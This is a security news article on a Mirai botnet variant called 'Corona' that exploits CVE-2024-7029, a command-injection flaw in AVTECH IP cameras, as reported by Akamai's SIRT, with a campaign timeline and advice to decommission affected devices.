Mirai Botnet Exploits Zero-Day Vulnerability CVE-2024-7029 in AVTECH IP Cameras

CVE-2024-7029 - CVE-2024-7029 PoC - AVTECH IP - Corona Mirai

Akamai’s Security Intelligence Response Team (SIRT) has discovered a widespread Mirai botnet campaign exploiting a recently disclosed zero-day vulnerability (CVE-2024-7029) in AVTECH IP cameras. The vulnerability, which allows for remote code execution, has been leveraged to propagate a Mirai variant dubbed “Corona,” raising significant concerns about critical infrastructure security.

CVE-2024-7029 is a remote code execution (RCE) vulnerability found in the “brightness” function of AVTECH IP cameras. This flaw allows malicious actors to execute command injections remotely, granting them elevated privileges on the target system. Exploiting this vulnerability, attackers can deploy a variant of the notorious Mirai botnet, spreading malware with alarming efficiency.

Despite the affected camera models being discontinued, they remain in use across various sectors, including critical infrastructure, highlighting the persistent challenge of managing legacy systems and the potential consequences of unaddressed vulnerabilities. The Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory emphasizing the severity of this vulnerability, citing its ease of exploitation and potential for widespread impact.

The botnet campaign exploiting CVE-2024-7029 is not limited to this single flaw. Akamai researchers have identified that the attackers are also targeting several other vulnerabilities, including those in AVTECH devices, a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215.

The botnet in question is spreading a Mirai variant, named “Corona,” which has been linked to the COVID-19 pandemic since 2020. Upon infection, this variant aggressively scans and attempts to exploit additional vulnerabilities, including those in Huawei devices, to expand its reach and reinforce its command and control infrastructure.

The Akamai SIRT observed the first active botnet campaign on March 18, 2024, with traces of activity dating back to December 2023. Although the proof of concept (PoC) for CVE-2024-7029 has been publicly available since 2019, it wasn’t until August 2024 that it received a formal CVE assignment.

While a patch for CVE-2024-7029 is not yet available, Akamai recommends decommissioning affected devices as the most effective mitigation strategy. Additionally, organizations should maintain a heightened state of vigilance, actively monitoring for signs of compromise and ensuring their security posture is robust enough to detect and respond to evolving threats.

Related Posts: